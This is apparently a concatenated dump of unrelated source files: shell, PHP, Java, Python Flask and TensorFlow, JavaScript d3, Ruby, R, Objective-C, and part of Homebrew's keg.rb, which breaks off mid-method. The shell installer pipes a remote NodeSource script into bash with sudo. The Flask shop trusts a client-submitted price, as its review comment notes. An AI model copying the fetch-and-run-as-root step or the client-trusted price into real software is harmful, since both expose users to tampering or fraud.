/usr/bin/php -f /research/www/groups/rwergergroup/intranet/stapl_perf/draw_algo_graphs.php mid 32 machine hydra set nightly type palgorithm container p_vector num_ts 10 class numeric > /research/www/groups/rwergergroup/intranet/stapl_perf/timing_hydra_nightly_palgorithm_p_vector_numeric.php
# /usr/bin/php -f /research/www/groups/rwergergroup/intranet/stapl_perf/draw_algo_graphs.php mid 32 machine hydra set nightly type palgorithm container p_matrix num_ts 10 class nonmutating > /research/www/groups/rwergergroup/intranet/stapl_perf/timing_hydra_nightly_palgorithm_p_matrix_nonmutating.php
# /usr/bin/php -f /research/www/groups/rwergergroup/intranet/stapl_perf/draw_algo_graphs.php mid 32 machine hydra set nightly type palgorithm container p_matrix num_ts 10 class mutating > /research/www/groups/rwergergroup/intranet/stapl_perf/timing_hydra_nightly_palgorithm_p_matrix_mutating.php
# /usr/bin/php -f /research/www/groups/rwergergroup/intranet/stapl_perf/draw_algo_graphs.php mid 32 machine hydra set nightly type palgorithm container p_matrix num_ts 10 class numeric > /research/www/groups/rwergergroup/intranet/stapl_perf/timing_hydra_nightly_palgorithm_p_matrix_numeric.php
# Sync the generated pages to the public web tree.
/usr/local/bin/update-www -r /research/www/groups/rwergergroup/intranet/stapl_perf
else
exit 0
fi
|
<filename>sources/ReviewZ/src/main/java/vn/com/reviewz/dao/ProductDAO.java
package vn.com.reviewz.dao;
/**
 * Data-access interface for Product entities.
 *
 * <p>Currently empty; CRUD methods are presumably added as the DAO layer is
 * implemented — TODO confirm intended operations.
 */
public interface ProductDAO {
}
|
#!/bin/sh
# Installer: sets up sudo handling, logging helpers, then installs Node.js 12
# (plus a C++ toolchain) on a dnf-based system.
# Reconstructed from a one-line, semicolon-mangled paste; the ANSI escape
# bytes lost in the mangling are restored via printf.

SUDO_CMD=$(which sudo)

USER="$(id -un 2>/dev/null || true)"
SUDO=''
if [ "$USER" != 'root' ]; then
	if [ -n "$SUDO_CMD" ]; then
		SUDO='sudo'
	else cat >&2 <<-'EOF'
	Error: this installer needs the ability to run commands as root.
	We are unable to find "sudo". Make sure its available to make this happen
	EOF
	exit 1
	fi
fi

# Color codes for the log helpers (POSIX-safe; no $'...' in /bin/sh).
RESET="$(printf '\033[0m')"
RED="$(printf '\033[0;31m')"
GREEN="$(printf '\033[0;32m')"
YELLOW="$(printf '\033[0;33m')"
log () { echo "[`date "+%Y.%m.%d-%H:%M:%S%Z"`]$1 $2"; }
info () { log "$GREEN INFO$RESET $1"; }
warn () { log "$YELLOW WARN$RESET $1"; }
error () { log "$RED ERROR$RESET $1"; }

$SUDO dnf install -y gcc-c++ make
curl -sL https://rpm.nodesource.com/setup_12.x | $SUDO -E bash -
$SUDO dnf install nodejs
import os
from flask import Flask, render_template, request
from sqlalchemy import create_engine
app = Flask(__name__)

# Database setup
# NOTE(review): DATABASE_URL must be set; a missing variable raises KeyError at import time.
engine = create_engine(os.environ['DATABASE_URL'])
@app.route('/')
def index():
    # Get the list of products from database.
    # NOTE(review): engine.execute() is the SQLAlchemy <2.0 API — confirm pinned version.
    products = engine.execute("SELECT * FROM products").fetchall()
    return render_template('index.html', products=products)
@app.route('/purchase', methods=['POST'])
def purchase():
    # Get the data from the form (all values are untrusted client input).
    name = request.form.get('name')
    email = request.form.get('email')
    product_id = request.form.get('product_id')
    # NOTE(review): price comes from the client form — a buyer could submit an
    # arbitrary price. It should be looked up server-side from products.
    price = request.form.get('price')
    # Insert the data into database (parameterized — safe from SQL injection).
    sql = "INSERT INTO orders (name, email, product_id, price) VALUES (%s, %s, %s, %s)"
    engine.execute(sql, (name, email, product_id, price))
    return render_template('purchase.html')
if __name__ == '__main__':
    # Development server only; debug=True must not be used in production.
    app.run(debug=True, port=5000)
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.
package org.apache.tapestry5.ioc;
import java.io.IOException;
import java.io.InputStream;
import java.net.URL;
import java.util.Locale;
/**
 * Represents a resource on the server that may be used for server side processing, or may be exposed to the client
 * side. Generally, this represents an abstraction on top of files on the class path and files stored in the web
 * application context.
 *
 * Resources are often used as map keys; they should be immutable and should implement hashCode() and equals().
 */
public interface Resource
{
    /**
     * Returns true if the resource exists; if a stream to the content of the file may be opened. A resource exists
     * if {@link #toURL()} returns a non-null value. Starting in release 5.3.4, the result of this is cached.
     *
     * Starting in 5.4, some "virtual resources", may return true even though {@link #toURL()} returns null.
     *
     * @return true if the resource exists, false if it does not
     */
    boolean exists();

    /**
     * Returns true if the resource is virtual, meaning there is no underlying file. Many operations are unsupported
     * on virtual resources, including {@link #toURL()}, {@link #forLocale(java.util.Locale)},
     * {@link #withExtension(String)}, {@link #getFile()}, {@link #getFolder()}, {@link #getPath()}; these
     * operations will throw an {@link java.lang.UnsupportedOperationException}.
     *
     * @since 5.4
     */
    boolean isVirtual();

    /**
     * Opens a stream to the content of the resource, or returns null if the resource does not exist. The native
     * input stream supplied by the resource is wrapped in a {@link java.io.BufferedInputStream}.
     *
     * @return an open, buffered stream to the content, if available
     */
    InputStream openStream() throws IOException;

    /**
     * Returns the URL for the resource, or null if it does not exist. This value is lazily computed; starting in 5.3.4, subclasses may cache
     * the result. Starting in 5.4, some "virtual resources" may return null.
     */
    URL toURL();

    /**
     * Returns a localized version of the resource. May return null if no such resource exists. Starting in release
     * 5.3.4, the result of this method is cached internally.
     */
    Resource forLocale(Locale locale);

    /**
     * Returns a Resource based on a relative path, relative to the folder containing the resource. Understands the "."
     * (current folder) and ".." (parent folder) conventions, and treats multiple sequential slashes as a single slash.
     *
     * Virtual resources (resources fabricated at runtime) return themselves.
     */
    Resource forFile(String relativePath);

    /**
     * Returns a new Resource with the extension changed (or, if the resource does not have an extension, the extension
     * is added). The new Resource may not exist (that is, {@link #toURL()} may return null).
     *
     * @param extension
     *         to apply to the resource, such as "html" or "properties"
     * @return the new resource
     */
    Resource withExtension(String extension);

    /**
     * Returns the portion of the path up to the last forward slash; this is the directory or folder portion of the
     * Resource.
     */
    String getFolder();

    /**
     * Returns the file portion of the Resource path, everything that follows the final forward slash.
     *
     * Starting in 5.4, certain kinds of "virtual resources" may return null here.
     */
    String getFile();

    /**
     * Return the path (the combination of folder and file).
     *
     * Starting in 5.4, certain "virtual resources", may return an arbitrary value here.
     */
    String getPath();
}
|
#!/bin/bash
##
## This script evaluate the insert size of the PE sequences by:
## 4. formatting the results
## Got the results:
##
echo '#LANE NUM_of_PAIRS MEAN MEDIAN SD' > 2.eva/res_ins.txt
cat $(ls 2.eva/*.eis) | grep -v '^#' >> 2.eva/res_ins.txt
##
## Got ALL the results:
##
## Remove the '_read' from the file:
sed -ri 's:_read::g' 2.eva/res_ins.txt
##
## Add the column to each line and save in another file
## (fixed: the header was read from ./res_ins.txt, but the file lives in 2.eva/)
echo $(grep '#' 2.eva/res_ins.txt) MAX MIN > 2.eva/res_ins_fin.txt
## MAX = mean + 3*SD, MIN = mean - 3*SD, computed with bc per line.
grep -v '#' 2.eva/res_ins.txt | while read a b c d e; do echo "$a $b $c $d $e $(echo $c + 3*$e | bc) $(echo $c - 3*$e | bc)";done >> 2.eva/res_ins_fin.txt
##
## Now the results are in res_ins_fin.txt
|
<reponame>DistrictDataLabs/04-team1
// Chart margins and inner plot dimensions (d3 v3 conventions).
var margin = {top: 20, right: 20, bottom: 30, left: 40},
    width = 960 - margin.left - margin.right,
    height = 500 - margin.top - margin.bottom;

// setup x
// NOTE(review): the console.log after `return` is unreachable dead code.
var xValue = function(d) { return d.Sentiment; console.log(d);}, // data -> value
    xScale = d3.scale.linear().range([0, width]), // value -> display
    xMap = function(d) { return xScale(xValue(d));}, // data -> display
    xAxis = d3.svg.axis().scale(xScale).orient("bottom");

//var yValue = function(d) { return d.Sentences;}, // data -> value
//var yValue = function(d, i) { return i;}, // data -> value
var yValue = function(d) { return d.countIndex;}, // data -> value
    yScale = d3.scale.linear().range([height, 0]), // value -> display
    yMap = function(d) { return yScale(yValue(d));}, // data -> display
    yAxis = d3.svg.axis().scale(yScale).orient("left");

// setup fill color
//var cValue = function(d) { return d.category;},
var color = d3.scale.category10();
// var color = d3.rgb("#ff9900"); // Pass in Hex
// var color = d3.rgb(12, 67, 199); // Red, Green, Blue
// var color = d3.hsl(0, chart5100, 50); // Hue-Saturation-Lightness (e.g. red)
// var color = d3.hcl(-97, 32, 52); // steelblue
// var color = d3.lab(52, -4, -32); // Lab color space (l, a, b); steelblue
// var color = d3.scale.ordinal()
// .range(colorbrewer.GnBu[9]);
// .range(["#FF0000", "#009933" , "#0000FF"]);
// .range(["#0000FF", "#009933" , "#FF0000"]);

// add the graph canvas to the body of the webpage
var chart5 = d3.select("body").append("svg")
    .attr("width", width + margin.left + margin.right)
    .attr("height", height + margin.top + margin.bottom)
  .append("g")
    .attr("transform", "translate(" + margin.left + "," + margin.top + ")");

// add the tooltip area to the webpage
var tooltip = d3.select("body").append("div")
    .attr("class", "tooltip")
    .style("opacity", 0);
// load data, then render axes, dots (each a link to its story), and tooltips.
d3.csv("js/stories_with_links_politics.csv", function(error, data) {
  // change string (from CSV) into number format
  data.forEach(function(d) {
    d.Sentiment = +d.Sentiment;
    d.countIndex = +d.countIndex;
    //console.log(d);
    //console.log(data);
  });

  // don't want dots overlapping axis, so add in buffer to data domain
  xScale.domain([d3.min(data, xValue)-1, d3.max(data, xValue)+1]);
  yScale.domain([d3.min(data, yValue)-1, d3.max(data, yValue)+1]);

  // x-axis
  chart5.append("g")
      .attr("class", "x axis")
      .attr("transform", "translate(0," + height + ")")
      .call(xAxis)
    .append("text")
      .attr("class", "label")
      .attr("x", width)
      .attr("y", -6)
      .style("text-anchor", "end")
      .text("Sentiment Score");

  // y-axis
  chart5.append("g")
      .attr("class", "y axis")
      .call(yAxis)
    .append("text")
      .attr("class", "label")
      .attr("transform", "rotate(-90)")
      .attr("y", 6)
      .attr("dy", ".71em")
      .style("text-anchor", "end");
      // .text("Number of Sentences");

  // draw dots; each dot is wrapped in an <a> pointing at the story's link.
  chart5.selectAll(".dot")
      .data(data)
      .enter()
      .append("a")
      .attr("xlink:href", function(d) {return d.link})
      .append("circle")
      .attr("class", "dot")
      .attr("r", 3.5)
      .attr("cx", xMap)
      .attr("cy", yMap)
      // .style("fill", function(d) { return color(cValue(d));})
      .style("fill", function(d) { return color(d.category);})
      .on("mouseover", function(d) {
          // fade the tooltip in near the cursor with title/sentiment/date
          tooltip.transition()
               .duration(200)
               .style("opacity", .9);
          tooltip.html(d.title + "<br/> (" + xValue(d) + " , " + d.date + ")")
               .style("left", (d3.event.pageX + 5) + "px")
               .style("top", (d3.event.pageY - 28) + "px");
      })
      .on("mouseout", function(d) {
          tooltip.transition()
               .duration(500)
               .style("opacity", 0);
      });

  // draw legend
  // var legend = chart5.selectAll(".legend")
  // .data(color.domain())
  // .enter().append("g")
  // .attr("class", "legend")
  // .attr("transform", function(d, i) { return "translate(0," + i * 20 + ")"; });
  //
  // // draw legend colored rectangles
  // legend.append("rect")
  // .attr("x", width - 18)
  // .attr("width", 18)
  // .attr("height", 18)
  // .style("fill", color);
  //
  // // draw legend text
  // legend.append("text")
  // .attr("x", width - 24)
  // .attr("y", 9)
  // .attr("dy", ".35em")
  // .style("text-anchor", "end")
  // // .text(function(d) {return d;})
  // .text("Politics")
});
|
<reponame>ideacrew/pa_edidb
# One-off audit script: for every non-canceled individual policy (non-GHMSI
# carriers) with coverage starting after 2016-12-31, write a maintenance
# "audit" XML file per policy.

carrier_ids = Carrier.where({
  :abbrev => {"$ne" => "GHMSI"}
}).map(&:id)
puts carrier_ids
plan_ids = Plan.where(:carrier_id => {"$in" => carrier_ids}).map(&:id)

# Individual (non-employer) policies whose subscriber coverage starts in 2017+.
# (The original built the identical query twice, into eligible_m_pols and
# eligible_pols, with dead chained `pols =` assignments; one query suffices.)
eligible_pols = Policy.where({
  :enrollees => {"$elemMatch" => {
    :rel_code => "self",
    :coverage_start => {"$gt" => Date.new(2016,12,31)}
  }}, :employer_id => nil, :plan_id => {"$in" => plan_ids}}).no_timeout

# Collect member ids of all enrollees on non-canceled policies to prime the cache.
m_ids = []
eligible_pols.each do |pol|
  if !pol.canceled?
    pol.enrollees.each do |en|
      m_ids << en.m_id
    end
  end
end

m_cache = Caches::MemberCache.new(m_ids)
Caches::MongoidCache.allocate(Plan)
Caches::MongoidCache.allocate(Carrier)

active_end = Date.new(2017,5,31)

eligible_pols.each do |pol|
  begin
    if !pol.canceled?
      if !(pol.subscriber.coverage_start > active_end)
        subscriber_id = pol.subscriber.m_id
        subscriber_member = m_cache.lookup(subscriber_id)
        auth_subscriber_id = subscriber_member.person.authority_member_id
        # Only emit the audit when the subscriber is the authority member.
        if auth_subscriber_id == subscriber_id
          enrollee_list = pol.enrollees.reject { |en| en.canceled? }
          all_ids = enrollee_list.map(&:m_id) | [subscriber_id]
          out_f = File.open(File.join("audits", "#{pol._id}_audit.xml"), 'w')
          ser = CanonicalVocabulary::MaintenanceSerializer.new(
            pol,
            "audit",
            "notification_only",
            all_ids,
            all_ids,
            { :term_boundry => active_end,
              :member_repo => m_cache }
          )
          out_f.write(ser.serialize)
          out_f.close
        end
      end
    end
  # NOTE(review): rescuing Exception is intentionally broad here so one bad
  # policy doesn't abort the batch; the id and error are logged instead.
  rescue Exception=>e
    puts "#{pol._id} - #{e.inspect}"
    next
  end
end
|
#!/bin/bash
# Run the simple-accounts-3 PHP test suite with testdox HTML output and
# convert it into the project's markdown test-contract document.
cd ~/Projects/chippyash/source/simple-accounts-3/
vendor/phpunit/phpunit/phpunit -c test/php/local-phpunit.xml --testdox-html contract.html test/php
tdconv -t "Simple Accounts V3" contract.html docs/Test-Contract.md
# The intermediate HTML is only needed for the conversion step.
rm contract.html
|
library(ggplot2)

# load cars dataset (expects columns `speed` and `distance`)
data <- read.table('cars.txt', header = TRUE)

# linear regression model: distance as a function of speed
model <- lm(distance ~ speed, data = data)

# plot the observations with the fitted regression line
# (geom_smooth(method = lm) refits the same linear model for display)
ggplot(data, aes(x = speed, y = distance)) +
  geom_point(colour = 'darkblue') +
  geom_smooth(method = lm, se = FALSE, colour = 'red')
<gh_stars>0
//
//  JJShebeixiangqing2Cell.h
//  shebeijiance
//
//  Created by 杨剑 on 2019/3/28.
//  Copyright © 2019 jjyangjian. All rights reserved.
//

#import <UIKit/UIKit.h>

NS_ASSUME_NONNULL_BEGIN

/// Table view cell for the device-detail ("shebei xiangqing") screen.
/// Declares no public API beyond UITableViewCell; configuration presumably
/// happens in the implementation file -- confirm against the matching .m.
@interface JJShebeixiangqing2Cell : UITableViewCell

@end

NS_ASSUME_NONNULL_END
|
import tensorflow as tf

# Linear-regression training loop using the TensorFlow 1.x graph API.
# NOTE(review): `n_features`, `total_batch` and `get_batch` are not defined
# in this script -- they must come from earlier in the session/file. Confirm.

# Hyperparameters
learning_rate = 0.001
epochs = 2000
batch_size = 100

# Placeholders: X is a batch of feature rows, y the matching scalar targets.
X = tf.placeholder(tf.float32, [None, n_features])
y = tf.placeholder(tf.float32, [None])

# Trainable weights and bias, randomly initialized.
W = tf.Variable(tf.random_normal([n_features, 1]))
b = tf.Variable(tf.random_normal([1]))

# Linear model: (batch, n_features) @ (n_features, 1) -> (batch, 1).
# Squeeze to shape (batch,) so it matches `y`. BUG FIX: without the squeeze,
# `y - y_pred` broadcasts (batch,) against (batch, 1) into a (batch, batch)
# matrix, so the "MSE" silently averaged all pairwise differences.
y_pred = tf.squeeze(tf.add(tf.matmul(X, W), b), axis=1)

# Mean-squared-error loss minimized with plain gradient descent.
loss = tf.reduce_mean(tf.square(y - y_pred))
optimizer = tf.train.GradientDescentOptimizer(
    learning_rate=learning_rate).minimize(loss)

# Initialize the variables
init = tf.global_variables_initializer()

# Training loop: one optimizer step per mini-batch.
with tf.Session() as sess:
    sess.run(init)
    for epoch in range(epochs):
        for i in range(total_batch):
            batch_x, batch_y = get_batch(batch_size)
            sess.run(optimizer, feed_dict={X: batch_x, y: batch_y})
# /initialize.sh
# Remove any previous build directory so the next build starts from scratch.
build_dir="/home/ubuntu/build"
if [ -d "$build_dir" ]; then
  rm -Rf "$build_dir"
fi
<reponame>Louayarbash/saint-sauveur
# typed: false
# frozen_string_literal: true
require "keg_relocate"
require "language/python"
require "lock_file"
require "ostruct"
require "extend/cachable"
# Installation prefix of a formula.
#
# @api private
class Keg
  extend T::Sig
  extend Cachable

  # Error for when a keg is already linked.
  class AlreadyLinkedError < RuntimeError
    def initialize(keg)
      super <<~EOS
        Cannot link #{keg.name}
        Another version is already linked: #{keg.linked_keg_record.resolved_path}
      EOS
    end
  end

  # Error for when a keg cannot be linked.
  # Wraps the underlying system error, preserving its message and backtrace.
  class LinkError < RuntimeError
    attr_reader :keg, :src, :dst

    def initialize(keg, src, dst, cause)
      @src = src
      @dst = dst
      @keg = keg
      @cause = cause
      super(cause.message)
      set_backtrace(cause.backtrace)
    end
  end

  # Error for when a file already exists or belongs to another keg.
  class ConflictError < LinkError
    extend T::Sig

    sig { returns(String) }
    def suggestion
      # Inline rescue/else on the method body: if the conflicting path is not
      # itself inside a keg, suggest removing it; otherwise suggest unlinking
      # the keg that owns it.
      conflict = Keg.for(dst)
    rescue NotAKegError, Errno::ENOENT
      "already exists. You may want to remove it:\n rm '#{dst}'\n"
    else
      <<~EOS
        is a symlink belonging to #{conflict.name}. You can unlink it:
        brew unlink #{conflict.name}
      EOS
    end

    sig { returns(String) }
    def to_s
      s = []
      s << "Could not symlink #{src}"
      s << "Target #{dst}" << suggestion
      s << <<~EOS
        To force the link and overwrite all conflicting files:
        brew link --overwrite #{keg.name}
        To list all files that would be deleted:
        brew link --overwrite --dry-run #{keg.name}
      EOS
      s.join("\n")
    end
  end

  # Error for when a directory is not writable.
  class DirectoryNotWritableError < LinkError
    extend T::Sig

    sig { returns(String) }
    def to_s
      <<~EOS
        Could not symlink #{src}
        #{dst.dirname} is not writable.
      EOS
    end
  end

  # Locale-specific directories have the form `language[_territory][.codeset][@modifier]`
  LOCALEDIR_RX = %r{(locale|man)/([a-z]{2}|C|POSIX)(_[A-Z]{2})?(\.[a-zA-Z\-0-9]+(@.+)?)?}.freeze
  # Matches GNU info files (and the info 'dir' index) under an info/ directory.
  INFOFILE_RX = %r{info/([^.].*?\.info|dir)$}.freeze
  # Top-level keg directories whose contents get symlinked into HOMEBREW_PREFIX.
  KEG_LINK_DIRECTORIES = %w[
    bin etc include lib sbin share var
  ].freeze
  MUST_EXIST_SUBDIRECTORIES = (
    KEG_LINK_DIRECTORIES - %w[var] + %w[
      opt
      var/homebrew/linked
    ]
  ).map { |dir| HOMEBREW_PREFIX/dir }.sort.uniq.freeze

  # Keep relatively in sync with
  # {https://github.com/Homebrew/install/blob/HEAD/install.sh}
  MUST_EXIST_DIRECTORIES = (MUST_EXIST_SUBDIRECTORIES + [
    HOMEBREW_CELLAR,
  ].sort.uniq).freeze
  MUST_BE_WRITABLE_DIRECTORIES = (
    %w[
      etc/bash_completion.d lib/pkgconfig
      share/aclocal share/doc share/info share/locale share/man
      share/man/man1 share/man/man2 share/man/man3 share/man/man4
      share/man/man5 share/man/man6 share/man/man7 share/man/man8
      share/zsh share/zsh/site-functions
      var/log
    ].map { |dir| HOMEBREW_PREFIX/dir } + MUST_EXIST_SUBDIRECTORIES + [
      HOMEBREW_CACHE,
      HOMEBREW_CELLAR,
      HOMEBREW_LOCKS,
      HOMEBREW_LOGS,
      HOMEBREW_REPOSITORY,
      Language::Python.homebrew_site_packages,
    ]
  ).sort.uniq.freeze

  # These paths relative to the keg's share directory should always be real
  # directories in the prefix, never symlinks.
  SHARE_PATHS = %w[
    aclocal doc info java locale man
    man/man1 man/man2 man/man3 man/man4
    man/man5 man/man6 man/man7 man/man8
    man/cat1 man/cat2 man/cat3 man/cat4
    man/cat5 man/cat6 man/cat7 man/cat8
    applications gnome gnome/help icons
    mime-info pixmaps sounds postgresql
  ].freeze

  ELISP_EXTENSIONS = %w[.el .elc].freeze
  PYC_EXTENSIONS = %w[.pyc .pyo].freeze
  LIBTOOL_EXTENSIONS = %w[.la .lai].freeze

  # Given an array of kegs, this method will try to find some other kegs
  # that depend on them. If it does, it returns:
  #
  # - some kegs in the passed array that have installed dependents
  # - some installed dependents of those kegs.
  #
  # If it doesn't, it returns nil.
  #
  # Note that nil will be returned if the only installed dependents
  # in the passed kegs are other kegs in the array.
  #
  # For efficiency, we don't bother trying to get complete data.
  def self.find_some_installed_dependents(kegs)
    keg_names = kegs.select(&:optlinked?).map(&:name)
    keg_formulae = []
    kegs_by_source = kegs.group_by do |keg|
      # First, attempt to resolve the keg to a formula
      # to get up-to-date name and tap information.
      f = keg.to_formula
      keg_formulae << f
      [f.name, f.tap]
    rescue
      # If the formula for the keg can't be found,
      # fall back to the information in the tab.
      [keg.name, keg.tab.tap]
    end
    all_required_kegs = Set.new
    all_dependents = []
    # Don't include dependencies of kegs that were in the given array.
    formulae_to_check = Formula.installed - keg_formulae
    formulae_to_check.each do |dependent|
      required = dependent.missing_dependencies(hide: keg_names)
      required_kegs = required.map do |f|
        f_kegs = kegs_by_source[[f.name, f.tap]]
        next unless f_kegs

        # Several versions of the same formula may be installed: report the newest.
        f_kegs.max_by(&:version)
      end.compact
      next if required_kegs.empty?

      all_required_kegs += required_kegs
      all_dependents << dependent.to_s
    end
    return if all_required_kegs.empty?
    return if all_dependents.empty?

    [all_required_kegs.to_a, all_dependents.sort]
  end

  # @param path if this is a file in a keg, returns the containing {Keg} object.
  def self.for(path)
    original_path = path
    raise Errno::ENOENT, original_path.to_s unless original_path.exist?

    # Walk up from the real path until we find a directory two levels below
    # the Cellar (i.e. Cellar/<name>/<version>), which is the keg root.
    if (path = original_path.realpath)
      until path.root?
        return Keg.new(path) if path.parent.parent == HOMEBREW_CELLAR.realpath

        path = path.parent.realpath # realpath() prevents root? failing
      end
    end
    raise NotAKegError, "#{original_path} is not inside a keg"
  end

  # All kegs currently installed in the Cellar (one per versioned subdirectory).
  def self.all
    Formula.racks.flat_map(&:subdirs).map { |d| new(d) }
  end

  attr_reader :path, :name, :linked_keg_record, :opt_record

  protected :path

  extend Forwardable

  def_delegators :path,
                 :to_s, :hash, :abv, :disk_usage, :file_count, :directory?, :exist?, :/,
                 :join, :rename, :find

  # @param path the keg's Cellar directory (Cellar/<name>/<version>);
  #   an opt path is resolved to the underlying Cellar directory first.
  def initialize(path)
    path = path.resolved_path if path.to_s.start_with?("#{HOMEBREW_PREFIX}/opt/")
    raise "#{path} is not a valid keg" if path.parent.parent.realpath != HOMEBREW_CELLAR.realpath
    raise "#{path} is not a directory" unless path.directory?

    @path = path
    @name = path.parent.basename.to_s
    @linked_keg_record = HOMEBREW_LINKED_KEGS/name
    @opt_record = HOMEBREW_PREFIX/"opt/#{name}"
    @require_relocation = false
  end

  # The rack is the Cellar/<name> directory holding all versions of the formula.
  def rack
    path.parent
  end

  alias to_path to_s

  sig { returns(String) }
  def inspect
    "#<#{self.class.name}:#{path}>"
  end

  # Kegs are equal when they are the same class and wrap the same path.
  def ==(other)
    instance_of?(other.class) && path == other.path
  end
  alias eql? ==

  # True when the keg contains nothing beyond metadata/metafiles.
  sig { returns(T::Boolean) }
  def empty_installation?
    Pathname.glob("#{path}/*") do |file|
      return false if file.directory? && !file.children.reject(&:ds_store?).empty?

      basename = file.basename.to_s
      next if Metafiles.copy?(basename)
      next if %w[.DS_Store INSTALL_RECEIPT.json].include?(basename)

      return false
    end

    true
  end

  def require_relocation?
    @require_relocation
  end

  # True when HOMEBREW_LINKED_KEGS/<name> points at this keg's path.
  def linked?
    linked_keg_record.symlink? &&
      linked_keg_record.directory? &&
      path == linked_keg_record.resolved_path
  end

  def remove_linked_keg_record
    linked_keg_record.unlink
    linked_keg_record.parent.rmdir_if_possible
  end

  # True when HOMEBREW_PREFIX/opt/<name> points at this keg's path.
  def optlinked?
    opt_record.symlink? && path == opt_record.resolved_path
  end

  # Removes stale opt/ and linkedkegs/ alias symlinks for this keg,
  # including versioned aliases that no longer apply.
  def remove_old_aliases
    opt = opt_record.parent
    linkedkegs = linked_keg_record.parent

    tap = begin
      to_formula.tap
    rescue
      # If the formula can't be found, just ignore aliases for now.
      nil
    end

    if tap
      bad_tap_opt = opt/tap.user
      FileUtils.rm_rf bad_tap_opt if !bad_tap_opt.symlink? && bad_tap_opt.directory?
    end

    aliases.each do |a|
      # versioned aliases are handled below
      next if a.match?(/.+@./)

      remove_alias_symlink(opt/a, opt_record)
      remove_alias_symlink(linkedkegs/a, linked_keg_record)
    end

    Pathname.glob("#{opt_record}@*").each do |a|
      a = a.basename.to_s
      next if aliases.include?(a)

      remove_alias_symlink(opt/a, rack)
      remove_alias_symlink(linkedkegs/a, rack)
    end
  end

  def remove_opt_record
    opt_record.unlink
    opt_record.parent.rmdir_if_possible
  end

  # Deletes the keg from disk and cleans up all records pointing at it.
  # @param raise_failures when true, re-raise permission errors instead of
  #   printing a manual-removal hint.
  def uninstall(raise_failures: false)
    CacheStoreDatabase.use(:linkage) do |db|
      break unless db.created?

      LinkageCacheStore.new(path, db).delete!
    end

    path.rmtree
    path.parent.rmdir_if_possible
    remove_opt_record if optlinked?
    remove_linked_keg_record if linked?
    remove_old_aliases
    remove_oldname_opt_record
  rescue Errno::EACCES, Errno::ENOTEMPTY
    raise if raise_failures

    odie <<~EOS
      Could not remove #{name} keg! Do so manually:
      sudo rm -rf #{path}
    EOS
  end

  # Removes the symlinks this keg installed into HOMEBREW_PREFIX.
  # Returns the number of removed links (via ObserverPathnameExtension.n).
  def unlink(verbose: false, dry_run: false)
    ObserverPathnameExtension.reset_counts!

    dirs = []

    keg_directories = KEG_LINK_DIRECTORIES.map { |d| path/d }
                                          .select(&:exist?)
    keg_directories.each do |dir|
      dir.find do |src|
        dst = HOMEBREW_PREFIX + src.relative_path_from(path)
        dst.extend(ObserverPathnameExtension)

        dirs << dst if dst.directory? && !dst.symlink?

        # check whether the file to be unlinked is from the current keg first
        next unless dst.symlink?
        next if src != dst.resolved_path

        if dry_run
          puts dst
          Find.prune if src.directory?
          next
        end

        dst.uninstall_info if dst.to_s.match?(INFOFILE_RX)
        dst.unlink
        Find.prune if src.directory?
      end
    end

    unless dry_run
      remove_old_aliases
      remove_linked_keg_record if linked?
      # Remove now-empty directories, deepest first.
      dirs.reverse_each(&:rmdir_if_possible)
    end

    ObserverPathnameExtension.n
  end

  # Holds the formula lock (and the old-name lock, if any) around the block.
  def lock(&block)
    FormulaLock.new(name).with_lock do
      if oldname_opt_record
        FormulaLock.new(oldname_opt_record.basename.to_s).with_lock(&block)
      else
        yield
      end
    end
  end

  # Whether the keg ships shell completions for the given shell
  # (:bash, :zsh or :fish).
  def completion_installed?(shell)
    dir = case shell
    when :bash then path/"etc/bash_completion.d"
    when :zsh
      dir = path/"share/zsh/site-functions"
      # zsh completion files start with an underscore.
      dir if dir.directory? && dir.children.any? { |f| f.basename.to_s.start_with?("_") }
    when :fish then path/"share/fish/vendor_completions.d"
    end
    dir&.directory? && !dir.children.empty?
  end

  # Whether the keg ships shell functions (as opposed to completions)
  # for the given shell (:fish or :zsh).
  def functions_installed?(shell)
    case shell
    when :fish
      dir = path/"share/fish/vendor_functions.d"
      dir.directory? && !dir.children.empty?
    when :zsh
      # Check for non completion functions (i.e. files not started with an underscore),
      # since those can be checked separately
      dir = path/"share/zsh/site-functions"
      dir.directory? && dir.children.any? { |f| !f.basename.to_s.start_with?("_") }
    end
  end

  sig { returns(T::Boolean) }
  def plist_installed?
    !Dir["#{path}/*.plist"].empty?
  end

  def python_site_packages_installed?
    (path/"lib/python2.7/site-packages").directory?
  end

  sig { returns(T::Boolean) }
  def python_pth_files_installed?
    !Dir["#{path}/lib/python2.7/site-packages/*.pth"].empty?
  end

  # macOS .app bundles shipped by the keg (top level or under libexec/).
  sig { returns(T::Array[Pathname]) }
  def apps
    app_prefix = optlinked? ? opt_record : path
    Pathname.glob("#{app_prefix}/{,libexec/}*.app")
  end

  # Whether the keg ships Emacs Lisp files under share/emacs/site-lisp/<name>.
  def elisp_installed?
    return false unless (path/"share/emacs/site-lisp"/name).exist?

    (path/"share/emacs/site-lisp"/name).children.any? { |f| ELISP_EXTENSIONS.include? f.extname }
  end

  # The keg's version, parsed from its Cellar directory name.
  def version
    require "pkg_version"
    PkgVersion.parse(path.basename.to_s)
  end

  def to_formula
    Formulary.from_keg(self)
  end

  # The opt symlink for a previous name of this formula, if one still exists.
  # Memoized; cleared by #remove_oldname_opt_record.
  def oldname_opt_record
    @oldname_opt_record ||= if (opt_dir = HOMEBREW_PREFIX/"opt").directory?
      opt_dir.subdirs.find do |dir|
        dir.symlink? && dir != opt_record && path.parent == dir.resolved_path.parent
      end
    end
  end

  # Symlinks the keg's contents into HOMEBREW_PREFIX. On any LinkError the
  # partial link is rolled back via #unlink before re-raising.
  # Returns the number of created links (via ObserverPathnameExtension.n).
  def link(verbose: false, dry_run: false, overwrite: false)
    raise AlreadyLinkedError, self if linked_keg_record.directory?

    ObserverPathnameExtension.reset_counts!

    optlink(verbose: verbose, dry_run: dry_run, overwrite: overwrite) unless dry_run

    # yeah indeed, you have to force anything you need in the main tree into
    # these dirs REMEMBER that *NOT* everything needs to be in the main tree
    link_dir("etc", verbose: verbose, dry_run: dry_run, overwrite: overwrite) { :mkpath }
    link_dir("bin", verbose: verbose, dry_run: dry_run, overwrite: overwrite) { :skip_dir }
    link_dir("sbin", verbose: verbose, dry_run: dry_run, overwrite: overwrite) { :skip_dir }
